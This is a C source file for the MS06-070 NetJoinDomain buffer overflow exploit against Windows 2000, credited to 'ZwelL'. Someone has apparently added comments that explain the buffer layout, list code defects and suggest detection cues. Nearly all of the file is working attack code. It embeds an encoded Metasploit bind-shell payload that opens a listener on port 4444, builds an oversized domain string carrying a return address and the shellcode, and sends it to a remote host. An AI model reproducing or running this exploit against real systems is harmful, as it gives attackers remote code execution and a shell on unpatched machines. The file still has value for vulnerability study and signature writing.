#include <windows.h>
#include <lm.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib, "netapi32")
/* win32_bind - EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
/*
 * Payload bytes copied verbatim from the generator named on the line above
 * (a win32 bind payload, LPORT=4444, Size=344, PexFnstenvSub encoder).
 * sizeof(scode) is 345: the 344 payload bytes plus the string terminator,
 * and buildbuf() below copies all 345 of them into the request buffer.
 * Detection note: the generator comment and this byte string are the most
 * stable artefacts of this tool for a file signature; a bind payload is
 * expected to open a listener on the stated port, which is the runtime cue.
 */
unsigned char scode[] =
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7e"
"\xe8\x56\xc8\x83\xeb\xfc\xe2\xf4\x82\x82\xbd\x85\x96\x11\xa9\x37"
"\x81\x88\xdd\xa4\x5a\xcc\xdd\x8d\x42\x63\x2a\xcd\x06\xe9\xb9\x43"
"\x31\xf0\xdd\x97\x5e\xe9\xbd\x81\xf5\xdc\xdd\xc9\x90\xd9\x96\x51"
"\xd2\x6c\x96\xbc\x79\x29\x9c\xc5\x7f\x2a\xbd\x3c\x45\xbc\x72\xe0"
"\x0b\x0d\xdd\x97\x5a\xe9\xbd\xae\xf5\xe4\x1d\x43\x21\xf4\x57\x23"
"\x7d\xc4\xdd\x41\x12\xcc\x4a\xa9\xbd\xd9\x8d\xac\xf5\xab\x66\x43"
"\x3e\xe4\xdd\xb8\x62\x45\xdd\x88\x76\xb6\x3e\x46\x30\xe6\xba\x98"
"\x81\x3e\x30\x9b\x18\x80\x65\xfa\x16\x9f\x25\xfa\x21\xbc\xa9\x18"
"\x16\x23\xbb\x34\x45\xb8\xa9\x1e\x21\x61\xb3\xae\xff\x05\x5e\xca"
"\x2b\x82\x54\x37\xae\x80\x8f\xc1\x8b\x45\x01\x37\xa8\xbb\x05\x9b"
"\x2d\xbb\x15\x9b\x3d\xbb\xa9\x18\x18\x80\x47\x94\x18\xbb\xdf\x29"
"\xeb\x80\xf2\xd2\x0e\x2f\x01\x37\xa8\x82\x46\x99\x2b\x17\x86\xa0"
"\xda\x45\x78\x21\x29\x17\x80\x9b\x2b\x17\x86\xa0\x9b\xa1\xd0\x81"
"\x29\x17\x80\x98\x2a\xbc\x03\x37\xae\x7b\x3e\x2f\x07\x2e\x2f\x9f"
"\x81\x3e\x03\x37\xae\x8e\x3c\xac\x18\x80\x35\xa5\xf7\x0d\x3c\x98"
"\x27\xc1\x9a\x41\x99\x82\x12\x41\x9c\xd9\x96\x3b\xd4\x16\x14\xe5"
"\x80\xaa\x7a\x5b\xf3\x92\x6e\x63\xd5\x43\x3e\xba\x80\x5b\x40\x37"
"\x0b\xac\xa9\x1e\x25\xbf\x04\x99\x2f\xb9\x3c\xc9\x2f\xb9\x03\x99"
"\x81\x38\x3e\x65\xa7\xed\x98\x9b\x81\x3e\x3c\x37\x81\xdf\xa9\x18"
"\xf5\xbf\xaa\x4b\xba\x8c\xa9\x1e\x2c\x17\x86\xa0\x91\x26\xb6\xa8"
"\x2d\x17\x80\x37\xae\xe8\x56\xc8";
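void print_line(const char *line)
{
#define LINELEN 60
    /*
     * Print LINE centred in a LINELEN-character field, bordered by '=' on
     * both sides and terminated with CRLF. A line whose first character is
     * '=' is padded with '=' (the banner rules); any other line with spaces.
     * Padding is split as (LINELEN - len)/2 on the left and the remainder on
     * the right, exactly as before. A NULL line is printed as "".
     *
     * Fix: a line longer than LINELEN used to yield a negative padding width
     * that was converted to a huge size_t for malloc()/memset(); such lines
     * are now printed with no padding. The padding is at most LINELEN bytes
     * per side, so it lives on the stack instead of two heap allocations.
     */
    if (!line) {
        line = "";
    }
    size_t len = strlen(line);
    size_t left = 0;
    size_t right = 0;
    if (len < LINELEN) {
        left = (LINELEN - len) / 2;
        right = LINELEN - left - len;
    }
    char pad[LINELEN + 1];
    memset(pad, (len > 0 && line[0] == '=') ? '=' : ' ', LINELEN);
    pad[LINELEN] = '\0';
    /* %.*s prints only the first `left`/`right` bytes of the fill buffer. */
    printf("=%.*s%s%.*s=\r\n", (int)left, pad, line, (int)right, pad);
}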
void printusage()
{
    /* Start-up banner: a rule, the credit lines, and a closing rule. */
    static char *const banner[] = {
        "==========================================",
        "MS06070 exploit for Win2K",
        "Coded By ZwelL",
        "zwell@sohu.com",
        "http://www.nosec.org",
        "2006.11.15",
        "==========================================",
    };
    for (size_t i = 0; i < sizeof banner / sizeof banner[0]; i++) {
        print_line(banner[i]);
    }
}
/*
 * Build the oversized "domain" argument that main() hands to NetJoinDomain().
 * Returns a malloc'd buffer of len+pos+2 bytes; the caller frees it. The
 * malloc() result is not checked before use.
 *
 * Layout, in bytes from the start of the buffer:
 *   [0, pos)        prec copied as raw bytes; pos = wcslen(prec)*2, which
 *                   assumes a 2-byte wchar_t (Windows).
 *   [pos, pos+len)  ascending 5-digit decimal numbers starting at 11111,
 *                   written with itoa(); each call also writes a NUL that the
 *                   next call overwrites. len is _len rounded down to a
 *                   multiple of 5.
 *   pos+2120        two 4-byte constants written through a DWORD cast
 *                   ((11535-11111)*5 == 2120), followed by all of scode
 *                   (sizeof includes its terminator).
 * The fixed offset is never compared with _len: any _len below
 * 2120 + 8 + sizeof(scode) overruns the allocation made here. The DWORD
 * stores go through a char* cast at an offset that depends on pos, so they
 * rely on x86 tolerating unaligned access. itoa() is the MSVC name and not
 * standard C. The author's comment calls the second constant an XP return
 * address while the banner names Win2K; which is intended cannot be told
 * from this file.
 * Detection note: a domain name consisting of a long run of consecutive
 * 5-digit numbers is a distinctive signature of this tool in request logs.
 */
char *buildbuf(int _len, wchar_t *prec)
{
int len = (_len/5)*5;
int pos = wcslen(prec)*2;
char *retstr = (char *)malloc(len+pos+2);
memset(retstr, 0, len+pos+2);
memcpy(retstr, prec, pos);
for(int i=11111; i<11111+len/5; i++)
{
itoa(i, &retstr[(i-11111)*5+pos], 10);
}
*(DWORD *)&retstr[(11535-11111)*5+pos] = 0x04eb06eb;
*(DWORD *)&retstr[(11535-11111)*5+pos+4] = 0x7801e85c;//xpret address
memcpy(&retstr[(11535-11111)*5+pos+4+4], scode, sizeof(scode));
return retstr;
}
/*
 * Entry point: prints the banner, then calls NetJoinDomain() with the host
 * from argv[1] as the server and the buffer from buildbuf() as the domain.
 * Usage: <ip> <domain>. Returns 0 when fewer than two arguments are given;
 * the function has no trailing return, so a completed run relies on C99's
 * implicit return of 0 from main.
 *
 * Defects visible here (flagged, not fixed):
 *   - szIp is 20 bytes but sprintf() writes "\\" + argv[1] unbounded, and
 *     mbstowcs() then converts strlen(szIp)+1 characters into wip[20]: an
 *     argv[1] longer than 17 characters overruns both stack arrays.
 *   - none of the malloc() results (prec, wprec, domain) is checked.
 *   - "Error : %d" prints a NET_API_STATUS (an unsigned DWORD) with a
 *     signed format specifier.
 */
int main(int argc, char **argv)
{
char szIp[20];      /* "\\" + argv[1]; written without a bound below */
wchar_t wip[20];    /* wide copy of szIp, same missing bound */
char *prec;         /* argv[2] followed by a single backslash */
wchar_t *domain;    /* buildbuf() result, reinterpreted as a wide string */
wchar_t *wprec;     /* wide copy of prec; 2*(n+2) bytes assumes 2-byte wchar_t */
NET_API_STATUS st;
printusage();
if(argc < 3)
{
printf("Usage : %s <ip> <domain>\n", argv[0]);
return 0;
}
sprintf(szIp, "\\\\%s", argv[1]);
mbstowcs(wip, szIp, strlen(szIp)+1);
prec = (char *)malloc(strlen(argv[2])+1+1);
wprec = (wchar_t *)malloc(2*(strlen(argv[2])+1+1));
sprintf(prec, "%s\\", argv[2]);
mbstowcs(wprec, prec, strlen(prec)+1);
/* buildbuf() returns char *; its bytes are passed on as a wide string. */
domain = (wchar_t *)buildbuf(4000, wprec);
//printf("%ws", wprec);
/* Server name is "\\<ip>", so this is presumably a remote call; the
 * receiving host sees a NetJoinDomain request whose domain argument is
 * roughly 4 KB long, which is the detection cue for this tool. The three
 * NULL arguments and the option flags are left as the author wrote them. */
st = NetJoinDomain(wip, domain, NULL, NULL, NULL, NETSETUP_JOIN_DOMAIN | NETSETUP_DOMAIN_JOIN_IF_JOINED);
//st = NetJoinDomain(L"\\\\192.168.1.173", L"Test\\test", NULL, NULL, NULL, NETSETUP_JOIN_DOMAIN | NETSETUP_DOMAIN_JOIN_IF_JOINED);
if(NERR_Success != st)
{
printf("Error : %d\n", st );
}
else
{
printf("ok");
}
/* domain was allocated by buildbuf(); ownership returned to this caller. */
free(domain);
free(prec);
free(wprec);
}
thanks x140t14n